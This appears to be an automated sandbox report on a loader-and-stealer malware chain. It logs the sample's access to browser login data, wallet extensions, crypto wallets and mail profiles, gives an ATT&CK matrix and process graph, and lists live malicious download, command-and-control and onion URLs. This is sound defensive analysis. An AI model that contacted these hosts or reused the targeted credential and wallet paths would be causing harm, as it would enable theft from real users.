                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: Far.pifBinary or memory string: WIN_81
                      Source: Far.pifBinary or memory string: WIN_XP
                      Source: Far.pifBinary or memory string: WIN_XPe
                      Source: Far.pif, 00000017.00000002.2986317642.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte(
                      Source: Far.pifBinary or memory string: WIN_VISTA
                      Source: Far.pifBinary or memory string: WIN_7
                      Source: Far.pifBinary or memory string: WIN_8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNN
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWY
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYN
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAG
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAG
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWY
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAU
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5544, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 30.0.E35F.exe.db8096.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 42.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.0.E35F.exe.db8096.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.0.E35F.exe.d30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001E.00000000.2271500419.0000000000D32000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000002.2767631716.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000002.2865725310.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: E35F.exe PID: 6072, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5544, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\E35F.exe, type: DROPPED
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6032, type: MEMORYSTR
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 35.2.5390.exe.4c0e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.5390.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.3.5390.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000022.00000002.2578542876.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000003.2383099821.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.2578790306.0000000000611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1708892086.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1708988921.0000000000751000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1984144647.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.2438465954.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.2438798088.0000000001FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1988409529.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 25.0.9D1E.exe.fb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\9D1E.exe, type: DROPPED
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0D51A0 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,21_2_00007FF73D0D51A0
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0D4A6C socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,21_2_00007FF73D0D4A6C
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
                      2
                      Valid Accounts
                      121
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      Exploitation for Privilege Escalation
                      11
                      Disable or Modify Tools
                      1
                      OS Credential Dumping
                      2
                      System Time Discovery
                      Remote Services12
                      Archive Collected Data
                      Exfiltration Over Other Network Medium1
                      Web Service
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
                      System Shutdown/Reboot
                      Acquire InfrastructureGather Victim Identity Information
                      Default Accounts1
                      Native API
                      2
                      Valid Accounts
                      1
                      DLL Side-Loading
                      111
                      Deobfuscate/Decode Files or Information
                      111
                      Input Capture
                      1
                      Account Discovery
                      Remote Desktop Protocol31
                      Data from Local System
                      Exfiltration Over Bluetooth14
                      Ingress Tool Transfer
                      SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
                      Domain Accounts1
                      Shared Modules
                      1
                      Registry Run Keys / Startup Folder
                      2
                      Valid Accounts
                      3
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      13
                      File and Directory Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      Automated Exfiltration11
                      Encrypted Channel
                      Data Encrypted for ImpactDNS ServerEmail Addresses
                      Local Accounts1
                      Exploitation for Client Execution
                      Login Hook21
                      Access Token Manipulation
                      23
                      Software Packing
                      NTDS169
                      System Information Discovery
                      Distributed Component Object Model111
                      Input Capture
                      Traffic Duplication11
                      Non-Standard Port
                      Data DestructionVirtual Private ServerEmployee Names
                      Cloud Accounts1
                      PowerShell
                      Network Logon Script913
                      Process Injection
                      1
                      Timestomp
                      LSA Secrets771
                      Security Software Discovery
                      SSH12
                      Clipboard Data
                      Scheduled Transfer1
                      Multi-hop Proxy
                      Data Encrypted for ImpactServerGather Victim Network Information
                      Replication Through Removable MediaScheduled TaskRC Scripts1
                      Registry Run Keys / Startup Folder
                      1
                      DLL Side-Loading
                      Cached Domain Credentials361
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureData Transfer Size Limits4
                      Non-Application Layer Protocol
                      Service StopBotnetDomain Properties
                      External Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      File Deletion
                      DCSync4
                      Process Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 Channel125
                      Application Layer Protocol
                      Inhibit System RecoveryWeb ServicesDNS
                      Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job221
                      Masquerading
                      Proc Filesystem11
                      Application Window Discovery
                      Cloud ServicesCredential API HookingExfiltration Over Alternative Protocol2
                      Proxy
                      DefacementServerlessNetwork Trust Dependencies
                      Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                      Valid Accounts
                      /etc/passwd and /etc/shadow1
                      System Owner/User Discovery
                      Direct Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
                      Supply Chain CompromisePowerShellCronCron361
                      Virtualization/Sandbox Evasion
                      Network Sniffing1
                      Remote System Discovery
                      Shared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses
                      Compromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
                      Access Token Manipulation
                      Input Capture11
                      System Network Configuration Discovery
                      Software Deployment ToolsRemote Data StagingExfiltration Over Unencrypted Non-C2 ProtocolMail ProtocolsFirmware CorruptionDomainsNetwork Security Appliances
                      Compromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task913
                      Process Injection
                      KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureExfiltration Over Physical MediumDNSResource HijackingDNS ServerGather Victim Org Information
                      Compromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                      Hidden Files and Directories
                      GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionExfiltration over USBProxyNetwork Denial of ServiceVirtual Private ServerDetermine Physical Locations
                      Trusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                      Regsvr32
                      Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionCommonly Used PortInternal ProxyDirect Network FloodServerBusiness Relationships
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1370880 Sample: 987123.exe Startdate: 07/01/2024 Architecture: WINDOWS Score: 100 108 pastebin.com 2->108 110 selebration17io.io 2->110 112 7 other IPs or domains 2->112 134 Multi AV Scanner detection for domain / URL 2->134 136 Found malware configuration 2->136 138 Malicious sample detected (through community Yara rule) 2->138 142 17 other signatures 2->142 11 987123.exe 2->11         started        14 ufhjbuw 2->14         started        16 ufhjbuw 2->16         started        18 2 other processes 2->18 signatures3 140 Connects to a pastebin service (likely for C&C) 108->140 process4 signatures5 182 Detected unpacking (changes PE section rights) 11->182 184 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 11->184 186 Maps a DLL or memory area into another process 11->186 20 explorer.exe 15 23 11->20 injected 188 Multi AV Scanner detection for dropped file 14->188 190 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->190 192 Checks if the current machine is a virtual machine (disk enumeration) 14->192 194 Creates a thread in another existing process (thread injection) 16->194 25 WerFault.exe 18->25         started        27 WerFault.exe 18->27         started        process6 dnsIp7 114 5.42.66.0 RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU Russian Federation 20->114 116 selebration17io.io 91.215.85.120, 49735, 80 PINDC-ASRU Russian Federation 20->116 118 3 other IPs or domains 20->118 88 C:\Users\user\AppData\Roaming\wehjbuw, PE32 20->88 dropped 90 C:\Users\user\AppData\Roaming\ufhjbuw, PE32 20->90 dropped 92 C:\Users\user\AppData\Local\Temp\FD8E.exe, PE32 20->92 dropped 94 9 other malicious files 20->94 dropped 144 System process connects to network (likely due to code injection or exploit) 20->144 146 Benign windows process drops PE files 20->146 148 Deletes itself after installation 20->148 150 Hides that the sample has been downloaded from the Internet (zone.identifier) 20->150 29 9D1E.exe 20->29         started        33 E35F.exe 20->33         started        35 3BD2.exe 15 20->35         started        37 8 other processes 20->37 file8 signatures9 process10 file11 96 C:\Users\user\AppData\...\Protect544cd51a.dll, PE32 29->96 dropped 196 Multi AV Scanner detection for dropped file 29->196 198 Machine Learning detection for dropped file 29->198 200 Found many strings related to Crypto-Wallets (likely being stolen) 29->200 216 4 other signatures 29->216 39 InstallUtil.exe 29->39         started        43 WerFault.exe 29->43         started        202 Antivirus detection for dropped file 33->202 204 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 33->204 206 Writes to foreign memory regions 33->206 45 InstallUtil.exe 33->45         started        98 C:\Users\user\AppData\Local\Temp\...\Zoo, PE32+ 35->98 dropped 208 Contains functionality to register a low level keyboard hook 35->208 47 cmd.exe 1 35->47         started        49 conhost.exe 35->49         started        100 C:\Users\user\AppData\Local\Temp\...\1600.tmp, PE32 37->100 dropped 102 C:\Users\user\AppData\...\InstallSetup9.exe, PE32 37->102 dropped 104 C:\...\288c47bbc1871b439df19ff4df68f076.exe, PE32 37->104 dropped 210 Detected unpacking (changes PE section rights) 37->210 212 Contains functionality to inject code into remote processes 37->212 214 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 37->214 218 4 other signatures 37->218 51 4577.exe 37->51         started        54 csrss.exe 37->54         started        56 1600.tmp 37->56         started        58 2 other processes 37->58 signatures12 process13 dnsIp14 120 drownthinsaltroutese.pw 172.67.131.114, 443, 49738, 49739 CLOUDFLARENETUS United States 39->120 152 Query firmware table information (likely to detect VMs) 39->152 154 Found many strings related to Crypto-Wallets (likely being stolen) 39->154 156 Tries to harvest and steal browser information (history, passwords, etc) 39->156 174 3 other signatures 39->174 122 ip-api.com 208.95.112.1 TUT-ASUS United States 45->122 124 t.me 149.154.167.99 TELEGRAMRU United Kingdom 45->124 130 2 other IPs or domains 45->130 158 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 45->158 160 Tries to steal Mail credentials (via file / registry access) 45->160 162 Found Tor onion address 45->162 164 Tries to harvest and steal Bitcoin Wallet information 45->164 60 cmd.exe 45->60         started        166 Uses ping.exe to sleep 47->166 168 Drops PE files with a suspicious file extension 47->168 170 Uses ping.exe to check the status of other devices and networks 47->170 62 cmd.exe 1 47->62         started        65 conhost.exe 47->65         started        126 127.0.0.1 unknown unknown 51->126 128 178.17.170.13, 49776, 9001 TRABIAMD Moldova Republic of 51->128 132 8 other IPs or domains 51->132 84 C:\ProgramData\Drivers\csrss.exe, PE32 51->84 dropped 172 May use the Tor software to hide its network traffic 51->172 67 1600.exe 56->67         started        file15 signatures16 process17 file18 70 conhost.exe 60->70         started        72 chcp.com 60->72         started        220 Uses ping.exe to sleep 62->220 74 Far.pif 62->74         started        77 cmd.exe 2 62->77         started        80 cmd.exe 2 62->80         started        82 6 other processes 62->82 86 C:\Users\user\AppData\Local\Temp\...\1600.tmp, PE32 67->86 dropped signatures19 process20 file21 176 Modifies the context of a thread in another process (thread injection) 74->176 178 Contains functionality to modify clipboard data 74->178 180 Injects a PE file into a foreign processes 74->180 106 C:\Users\user\AppData\Local\Temp\...\Far.pif, PE32+ 77->106 dropped signatures22

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      987123.exe46%ReversingLabsWin32.Trojan.Privateloader
                      987123.exe48%VirustotalBrowse
                      987123.exe100%AviraHEUR/AGEN.1312567
                      987123.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\5390.exe100%AviraHEUR/AGEN.1312567
                      C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe100%AviraHEUR/AGEN.1303617
                      C:\Users\user\AppData\Local\Temp\2DF.exe100%AviraHEUR/AGEN.1309922
                      C:\Users\user\AppData\Local\Temp\FD8E.exe100%AviraHEUR/AGEN.1305491
                      C:\Users\user\AppData\Local\Temp\1600.exe100%AviraHEUR/AGEN.1332570
                      C:\Users\user\AppData\Local\Temp\E35F.exe100%AviraHEUR/AGEN.1362350
                      C:\Users\user\AppData\Local\Temp\5390.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\35E5.dll100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\2DF.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\4577.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\9D1E.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\FD8E.exe100%Joe Sandbox ML
                      C:\ProgramData\Drivers\csrss.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\E35F.exe100%Joe Sandbox ML
                      C:\ProgramData\Drivers\csrss.exe70%ReversingLabsWin32.Trojan.Smokeloader
                      C:\ProgramData\Drivers\csrss.exe51%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\1600.exe11%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\1600.exe12%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe100%ReversingLabsWin32.Trojan.Stealc
                      C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe65%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\35E5.dll61%ReversingLabsWin32.Trojan.Smokeloader
                      C:\Users\user\AppData\Local\Temp\35E5.dll63%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\3BD2.exe3%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\3BD2.exe3%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\4577.exe70%ReversingLabsWin32.Trojan.Smokeloader
                      C:\Users\user\AppData\Local\Temp\4577.exe51%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\5390.exe41%ReversingLabsWin32.Dropper.Generic
                      C:\Users\user\AppData\Local\Temp\5390.exe46%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pif0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pif1%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Zoo0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\9D1E.exe27%ReversingLabsWin32.Spyware.Lummastealer
                      C:\Users\user\AppData\Local\Temp\FD8E.exe96%ReversingLabsByteCode-MSIL.Trojan.Smokeloader
                      C:\Users\user\AppData\Local\Temp\InstallSetup9.exe91%ReversingLabsWin32.Downloader.Taily
                      C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\is-9S7V0.tmp\1600.tmp4%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\is-K8FH3.tmp\1600.tmp4%ReversingLabs
                      C:\Users\user\AppData\Roaming\ufhjbuw46%ReversingLabsWin32.Trojan.Privateloader
                      C:\Users\user\AppData\Roaming\wehjbuw41%ReversingLabsWin32.Dropper.Generic
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      hugo.topteamlife.com9%VirustotalBrowse
                      gxutc2c.com11%VirustotalBrowse
                      ftpvoyager.cc18%VirustotalBrowse
                      selebration17io.io3%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
                      https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%URL Reputationsafe
                      https://outlook.com_0%URL Reputationsafe
                      https://powerpoint.office.comcember0%URL Reputationsafe
                      http://schemas.micro0%URL Reputationsafe
                      http://schemas.datacontract.org/2004/07/EInvalidGlobalDataContractNamespace?DataContractNamespaceAlr0%Avira URL Cloudsafe
                      https://drownthinsaltroutese.pw/apiq20%Avira URL Cloudsafe
                      goddirtybrilliancece.fun0%Avira URL Cloudsafe
                      https://curl.se/docs/hsts.html0%Avira URL Cloudsafe
                      http://5.42.66.0/288c47bbc187111b439df19ff4df68f076.exe100%Avira URL Cloudmalware
                      blastechohackopeower.pw100%Avira URL Cloudmalware
                      https://drownthinsaltroutese.pw/0%Avira URL Cloudsafe
                      http://hugo.topteamlife.com/order/tuc5.exe100%Avira URL Cloudmalware
                      https://curl.se/docs/hsts.html0%VirustotalBrowse
                      blastechohackopeower.pw5%VirustotalBrowse
                      http://buriatiarutuhuob.net/index.php0%Avira URL Cloudsafe
                      http://ftpvoyager.cc/ftp/index.php100%Avira URL Cloudmalware
                      http://5.42.66.0/288c47bbc187111b439df19ff4df68f076.exe20%VirustotalBrowse
                      http://www.innosetup.com/0%Avira URL Cloudsafe
                      http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion100%Avira URL Cloudmalware
                      http://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onionT/reg.php?upd.php?/task.php?/re0%Avira URL Cloudsafe
                      http://ftpvoyager.cc/ftp/index.php3%VirustotalBrowse
                      http://schemas.datacontract.org/2004/07/EInvalidGlobalDataContractNamespace?DataContractNamespaceAlr0%VirustotalBrowse
                      http://crl.ver)0%Avira URL Cloudsafe
                      http://pastebin.comd0%Avira URL Cloudsafe
                      http://hugo.topteamlife.com/order/tuc5.exe8%VirustotalBrowse
                      https://curl.se/docs/alt-svc.html0%Avira URL Cloudsafe
                      https://drownthinsaltroutese.pw/0%VirustotalBrowse
                      https://drownthinsaltroutese.pw/pi0%Avira URL Cloudsafe
                      drownthinsaltroutese.pw0%Avira URL Cloudsafe
                      https://curl.se/docs/alt-svc.html0%VirustotalBrowse
                      http://cassiosssionunu.me/index.php0%Avira URL Cloudsafe
                      http://buriatiarutuhuob.net/index.php1%VirustotalBrowse
                      http://selebration17io.io/index.php0%Avira URL Cloudsafe
                      http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/ef0e6c9136fd4b779a75726a3100%Avira URL Cloudmalware
                      http://t.med0%Avira URL Cloudsafe
                      http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion4%VirustotalBrowse
                      http://www.innosetup.com/2%VirustotalBrowse
                      https://drownthinsaltroutese.pw/api0%Avira URL Cloudsafe
                      http://valarioulinity1.net/index.php0%Avira URL Cloudsafe
                      https://drownthinsaltroutese.pw/ak0%Avira URL Cloudsafe
                      http://cassiosssionunu.me/index.php1%VirustotalBrowse
                      http://selebration17io.io/index.php2%VirustotalBrowse
                      https://cdn5.cdn-telegram.org/file/i4QQmSX-IWl_DPP440WbnzRvPCaYFxClaDPOTGTMNvRYQOqwUilTO2gWelNn07kDZ0%Avira URL Cloudsafe
                      https://drownthinsaltroutese.pw/Hk0%Avira URL Cloudsafe
